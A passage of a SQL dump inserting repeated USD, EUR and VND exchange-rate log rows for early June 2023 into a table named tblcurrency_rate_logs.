(4888, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-04'),
(4889, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-04'),
(4890, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-04'),
(4891, 1, 'USD', 1.000000, 2, 'EUR', 0.929110, '2023-06-04'),
(4892, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-04'),
(4893, 2, 'EUR', 1.000000, 1, 'USD', 1.076300, '2023-06-04'),
(4894, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-04'),
(4895, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-04'),
(4896, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-04'),
(4897, 1, 'USD', 0.000000, 2, 'EUR', 0.929110, '2023-06-04'),
(4898, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-04'),
(4899, 2, 'EUR', 0.000000, 1, 'USD', 1.076300, '2023-06-04'),
(4900, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-04'),
(4901, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-04'),
(4902, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-04'),
(4903, 1, 'USD', 1.000000, 2, 'EUR', 0.929110, '2023-06-05'),
(4904, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-05'),
(4905, 2, 'EUR', 1.000000, 1, 'USD', 1.076300, '2023-06-05'),
(4906, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-05'),
(4907, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-05'),
(4908, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-05'),
(4909, 1, 'USD', 0.000000, 2, 'EUR', 0.929110, '2023-06-05'),
(4910, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-05'),
(4911, 2, 'EUR', 0.000000, 1, 'USD', 1.076300, '2023-06-05'),
(4912, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-05'),
(4913, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-05'),
(4914, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-05'),
(4915, 1, 'USD', 1.000000, 2, 'EUR', 0.929110, '2023-06-05'),
(4916, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-05'),
(4917, 2, 'EUR', 1.000000, 1, 'USD', 1.076300, '2023-06-05'),
(4918, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-05'),
(4919, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-05'),
(4920, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-05'),
(4921, 1, 'USD', 0.000000, 2, 'EUR', 0.929110, '2023-06-05'),
(4922, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-05'),
(4923, 2, 'EUR', 0.000000, 1, 'USD', 1.076300, '2023-06-05'),
(4924, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-05'),
(4925, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-05'),
(4926, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-05'),
(4927, 1, 'USD', 1.000000, 2, 'EUR', 0.929110, '2023-06-05'),
(4928, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-05'),
(4929, 2, 'EUR', 1.000000, 1, 'USD', 1.076300, '2023-06-05'),
(4930, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-05'),
(4931, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-05'),
(4932, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-05'),
(4933, 1, 'USD', 0.000000, 2, 'EUR', 0.929110, '2023-06-05'),
(4934, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-05'),
(4935, 2, 'EUR', 0.000000, 1, 'USD', 1.076300, '2023-06-05'),
(4936, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-05'),
(4937, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-05'),
(4938, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-05'),
(4939, 1, 'USD', 1.000000, 2, 'EUR', 0.929110, '2023-06-05'),
(4940, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-05'),
(4941, 2, 'EUR', 1.000000, 1, 'USD', 1.076300, '2023-06-05'),
(4942, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-05'),
(4943, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-05'),
(4944, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-05'),
(4945, 1, 'USD', 0.000000, 2, 'EUR', 0.929110, '2023-06-05'),
(4946, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-05'),
(4947, 2, 'EUR', 0.000000, 1, 'USD', 1.076300, '2023-06-05'),
(4948, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-05'),
(4949, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-05'),
(4950, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-05'),
(4951, 1, 'USD', 1.000000, 2, 'EUR', 0.929110, '2023-06-06'),
(4952, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-06'),
(4953, 2, 'EUR', 1.000000, 1, 'USD', 1.076300, '2023-06-06'),
(4954, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-06'),
(4955, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-06'),
(4956, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-06'),
(4957, 1, 'USD', 0.000000, 2, 'EUR', 0.935450, '2023-06-06'),
(4958, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-06'),
(4959, 2, 'EUR', 0.000000, 1, 'USD', 1.069000, '2023-06-06'),
(4960, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-06'),
(4961, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-06'),
(4962, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-06'),
(4963, 1, 'USD', 1.000000, 2, 'EUR', 0.935450, '2023-06-06'),
(4964, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-06'),
(4965, 2, 'EUR', 1.000000, 1, 'USD', 1.069000, '2023-06-06'),
(4966, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-06'),
(4967, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-06'),
(4968, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-06'),
(4969, 1, 'USD', 0.000000, 2, 'EUR', 0.935450, '2023-06-06'),
(4970, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-06'),
(4971, 2, 'EUR', 0.000000, 1, 'USD', 1.069000, '2023-06-06'),
(4972, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-06'),
(4973, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-06'),
(4974, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-06'),
(4975, 1, 'USD', 1.000000, 2, 'EUR', 0.935450, '2023-06-06'),
(4976, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-06'),
(4977, 2, 'EUR', 1.000000, 1, 'USD', 1.069000, '2023-06-06'),
(4978, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-06'),
(4979, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-06'),
(4980, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-06'),
(4981, 1, 'USD', 0.000000, 2, 'EUR', 0.935450, '2023-06-06'),
(4982, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-06'),
(4983, 2, 'EUR', 0.000000, 1, 'USD', 1.069000, '2023-06-06'),
(4984, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-06'),
(4985, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-06'),
(4986, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-06'),
(4987, 1, 'USD', 1.000000, 2, 'EUR', 0.935450, '2023-06-06'),
(4988, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-06'),
(4989, 2, 'EUR', 1.000000, 1, 'USD', 1.069000, '2023-06-06'),
(4990, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-06'),
(4991, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-06'),
(4992, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-06'),
(4993, 1, 'USD', 0.000000, 2, 'EUR', 0.935450, '2023-06-06'),
(4994, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-06'),
(4995, 2, 'EUR', 0.000000, 1, 'USD', 1.069000, '2023-06-06'),
(4996, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-06'),
(4997, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-06'),
(4998, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-06');
INSERT INTO `tblcurrency_rate_logs` (`id`, `from_currency_id`, `from_currency_name`, `from_currency_rate`, `to_currency_id`, `to_currency_name`, `to_currency_rate`, `date`) VALUES
(4999, 1, 'USD', 1.000000, 2, 'EUR', 0.935450, '2023-06-07'),
(5000, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-07'),
(5001, 2, 'EUR', 1.000000, 1, 'USD', 1.069000, '2023-06-07'),
(5002, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-07'),
(5003, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-07'),
(5004, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-07'),
(5005, 1, 'USD', 0.000000, 2, 'EUR', 0.936070, '2023-06-07'),
(5006, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-07'),
(5007, 2, 'EUR', 0.000000, 1, 'USD', 1.068300, '2023-06-07'),
(5008, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-07'),
(5009, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-07'),
(5010, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-07'),
(5011, 1, 'USD', 1.000000, 2, 'EUR', 0.936070, '2023-06-07'),
(5012, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-07'),
(5013, 2, 'EUR', 1.000000, 1, 'USD', 1.068300, '2023-06-07'),
(5014, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-07'),
(5015, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-07'),
(5016, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-07'),
(5017, 1, 'USD', 0.000000, 2, 'EUR', 0.936070, '2023-06-07'),
(5018, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-07'),
(5019, 2, 'EUR', 0.000000, 1, 'USD', 1.068300, '2023-06-07'),
(5020, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-07'),
(5021, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-07'),
(5022, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-07'),
(5023, 1, 'USD', 1.000000, 2, 'EUR', 0.936070, '2023-06-07'),
(5024, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-07'),
(5025, 2, 'EUR', 1.000000, 1, 'USD', 1.068300, '2023-06-07'),
(5026, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-07'),
(5027, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-07'),
(5028, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-07'),
(5029, 1, 'USD', 0.000000, 2, 'EUR', 0.936070, '2023-06-07'),
(5030, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-07'),
(5031, 2, 'EUR', 0.000000, 1, 'USD', 1.068300, '2023-06-07'),
(5032, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-07'),
(5033, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-07'),
(5034, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-07'),
(5035, 1, 'USD', 1.000000, 2, 'EUR', 0.936070, '2023-06-07'),
(5036, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-07'),
(5037, 2, 'EUR', 1.000000, 1, 'USD', 1.068300, '2023-06-07'),
(5038, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-07'),
(5039, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-07'),
(5040, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-07'),
(5041, 1, 'USD', 0.000000, 2, 'EUR', 0.936070, '2023-06-07'),
(5042, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-07'),
(5043, 2, 'EUR', 0.000000, 1, 'USD', 1.068300, '2023-06-07'),
(5044, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-07'),
(5045, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-07'),
(5046, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-07'),
(5047, 1, 'USD', 1.000000, 2, 'EUR', 0.936070, '2023-06-08'),
(5048, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-08'),
(5049, 2, 'EUR', 1.000000, 1, 'USD', 1.068300, '2023-06-08'),
(5050, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-08'),
(5051, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-08'),
(5052, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-08'),
(5053, 1, 'USD', 0.000000, 2, 'EUR', 0.933100, '2023-06-08'),
(5054, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-08'),
(5055, 2, 'EUR', 0.000000, 1, 'USD', 1.071700, '2023-06-08'),
(5056, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-08'),
(5057, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-08'),
(5058, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-08'),
(5059, 1, 'USD', 1.000000, 2, 'EUR', 0.933100, '2023-06-08'),
(5060, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-08'),
(5061, 2, 'EUR', 1.000000, 1, 'USD', 1.071700, '2023-06-08'),
(5062, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-08'),
(5063, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-08'),
(5064, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-08'),
(5065, 1, 'USD', 0.000000, 2, 'EUR', 0.933100, '2023-06-08'),
(5066, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-08'),
(5067, 2, 'EUR', 0.000000, 1, 'USD', 1.071700, '2023-06-08'),
(5068, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-08'),
(5069, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-08'),
(5070, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-08'),
(5071, 1, 'USD', 1.000000, 2, 'EUR', 0.933100, '2023-06-08'),
(5072, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-08'),
(5073, 2, 'EUR', 1.000000, 1, 'USD', 1.071700, '2023-06-08'),
(5074, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-08'),
(5075, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-08'),
(5076, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-08'),
(5077, 1, 'USD', 0.000000, 2, 'EUR', 0.933100, '2023-06-08'),
(5078, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-08'),
(5079, 2, 'EUR', 0.000000, 1, 'USD', 1.071700, '2023-06-08'),
(5080, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-08'),
(5081, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-08'),
(5082, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-08'),
(5083, 1, 'USD', 1.000000, 2, 'EUR', 0.933100, '2023-06-08'),
(5084, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-08'),
(5085, 2, 'EUR', 1.000000, 1, 'USD', 1.071700, '2023-06-08'),
(5086, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-08'),
(5087, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-08'),
(5088, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-08'),
(5089, 1, 'USD', 0.000000, 2, 'EUR', 0.933100, '2023-06-08'),
(5090, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-08'),
(5091, 2, 'EUR', 0.000000, 1, 'USD', 1.071700, '2023-06-08'),
(5092, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-08'),
(5093, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-08'),
(5094, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-08'),
(5095, 1, 'USD', 1.000000, 2, 'EUR', 0.933100, '2023-06-09'),
(5096, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-09'),
(5097, 2, 'EUR', 1.000000, 1, 'USD', 1.071700, '2023-06-09'),
(5098, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-09'),
(5099, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-09'),
(5100, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-09'),
(5101, 1, 'USD', 0.000000, 2, 'EUR', 0.931360, '2023-06-09'),
(5102, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-09'),
(5103, 2, 'EUR', 0.000000, 1, 'USD', 1.073700, '2023-06-09'),
(5104, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-09'),
(5105, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-09'),
(5106, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-09'),
(5107, 1, 'USD', 1.000000, 2, 'EUR', 0.931360, '2023-06-09'),
(5108, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-09'),
(5109, 2, 'EUR', 1.000000, 1, 'USD', 1.073700, '2023-06-09'),
(5110, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-09'),
(5111, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-09'),
(5112, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-09'),
(5113, 1, 'USD', 0.000000, 2, 'EUR', 0.931360, '2023-06-09'),
(5114, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-09'),
(5115, 2, 'EUR', 0.000000, 1, 'USD', 1.073700, '2023-06-09'),
(5116, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-09'),
(5117, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-09'),
(5118, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-09'),
(5119, 1, 'USD', 1.000000, 2, 'EUR', 0.931360, '2023-06-09'),
(5120, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-09'),
(5121, 2, 'EUR', 1.000000, 1, 'USD', 1.073700, '2023-06-09'),
(5122, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-09'),
(5123, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-09'),
(5124, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-09'),
(5125, 1, 'USD', 0.000000, 2, 'EUR', 0.931360, '2023-06-09'),
(5126, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-09'),
(5127, 2, 'EUR', 0.000000, 1, 'USD', 1.073700, '2023-06-09'),
(5128, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-09'),
(5129, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-09'),
(5130, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-09'),
(5131, 1, 'USD', 1.000000, 2, 'EUR', 0.931360, '2023-06-09'),
(5132, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-09'),
(5133, 2, 'EUR', 1.000000, 1, 'USD', 1.073700, '2023-06-09'),
(5134, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-09'),
(5135, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-09'),
(5136, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-09'),
(5137, 1, 'USD', 0.000000, 2, 'EUR', 0.931360, '2023-06-09'),
(5138, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-09'),
(5139, 2, 'EUR', 0.000000, 1, 'USD', 1.073700, '2023-06-09'),
(5140, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-09'),
(5141, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-09'),
(5142, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-09'),
(5143, 1, 'USD', 1.000000, 2, 'EUR', 0.931360, '2023-06-10'),
(5144, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-10'),
(5145, 2, 'EUR', 1.000000, 1, 'USD', 1.073700, '2023-06-10'),
(5146, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-10'),
(5147, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-10'),
(5148, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-10'),
(5149, 1, 'USD', 0.000000, 2, 'EUR', 0.927640, '2023-06-10'),
(5150, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-10'),
(5151, 2, 'EUR', 0.000000, 1, 'USD', 1.078000, '2023-06-10'),
(5152, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-10'),
(5153, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-10'),
(5154, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-10'),
(5155, 1, 'USD', 1.000000, 2, 'EUR', 0.927640, '2023-06-10'),
(5156, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-10'),
(5157, 2, 'EUR', 1.000000, 1, 'USD', 1.078000, '2023-06-10'),
(5158, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-10'),
(5159, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-10'),
(5160, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-10'),
(5161, 1, 'USD', 0.000000, 2, 'EUR', 0.927640, '2023-06-10'),
(5162, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-10'),
(5163, 2, 'EUR', 0.000000, 1, 'USD', 1.078000, '2023-06-10'),
(5164, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-10'),
(5165, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-10'),
(5166, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-10'),
(5167, 1, 'USD', 1.000000, 2, 'EUR', 0.927640, '2023-06-10'),
(5168, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-10'),
(5169, 2, 'EUR', 1.000000, 1, 'USD', 1.078000, '2023-06-10'),
(5170, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-10'),
(5171, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-10'),
(5172, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-10'),
(5173, 1, 'USD', 0.000000, 2, 'EUR', 0.927640, '2023-06-10'),
(5174, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-10'),
(5175, 2, 'EUR', 0.000000, 1, 'USD', 1.078000, '2023-06-10'),
(5176, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-10'),
(5177, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-10'),
(5178, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-10'),
(5179, 1, 'USD', 1.000000, 2, 'EUR', 0.927640, '2023-06-10'),
(5180, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-10'),
(5181, 2, 'EUR', 1.000000, 1, 'USD', 1.078000, '2023-06-10'),
(5182, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-10'),
(5183, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-10'),
(5184, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-10'),
(5185, 1, 'USD', 0.000000, 2, 'EUR', 0.927640, '2023-06-10'),
(5186, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-10'),
(5187, 2, 'EUR', 0.000000, 1, 'USD', 1.078000, '2023-06-10'),
(5188, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-10'),
(5189, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-10'),
(5190, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-10'),
(5191, 1, 'USD', 1.000000, 2, 'EUR', 0.927640, '2023-06-11'),
(5192, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-11'),
(5193, 2, 'EUR', 1.000000, 1, 'USD', 1.078000, '2023-06-11'),
(5194, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-11'),
(5195, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-11'),
(5196, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-11'),
(5197, 1, 'USD', 0.000000, 2, 'EUR', 0.927640, '2023-06-11'),
(5198, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-11'),
(5199, 2, 'EUR', 0.000000, 1, 'USD', 1.078000, '2023-06-11'),
(5200, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-11'),
(5201, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-11'),
(5202, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-11'),
(5203, 1, 'USD', 1.000000, 2, 'EUR', 0.927640, '2023-06-11'),
(5204, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-11'),
(5205, 2, 'EUR', 1.000000, 1, 'USD', 1.078000, '2023-06-11'),
(5206, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-11'),
(5207, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-11'),
(5208, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-11'),
(5209, 1, 'USD', 0.000000, 2, 'EUR', 0.927640, '2023-06-11'),
(5210, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-11'),
(5211, 2, 'EUR', 0.000000, 1, 'USD', 1.078000, '2023-06-11'),
(5212, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-11'),
(5213, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-11'),
(5214, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-11'),
(5215, 1, 'USD', 1.000000, 2, 'EUR', 0.927640, '2023-06-11'),
(5216, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-11'),
(5217, 2, 'EUR', 1.000000, 1, 'USD', 1.078000, '2023-06-11'),
(5218, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-11'),
(5219, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-11'),
(5220, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-11'),
(5221, 1, 'USD', 0.000000, 2, 'EUR', 0.927640, '2023-06-11'),
(5222, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-11'),
(5223, 2, 'EUR', 0.000000, 1, 'USD', 1.078000, '2023-06-11'),
(5224, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-11'),
(5225, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-06-11'),
(5226, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-06-11'),
(5227, 1, 'USD', 1.000000, 2, 'EUR', 0.927640, '2023-06-11'),
(5228, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-06-11'),
(5229, 2, 'EUR', 1.000000, 1, 'USD', 1.078000, '2023-06-11'),
(5230, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-06-11'),
(5231, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-06-11'),
(5232, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-06-11'),
(5233, 1, 'USD', 0.000000, 2, 'EUR', 0.927640, '2023-06-11'),
(5234, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-06-11'),
(5235, 2, 'EUR', 0.000000, 1, 'USD', 1.078000, '2023-06-11'),
(5236, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-06-11'),
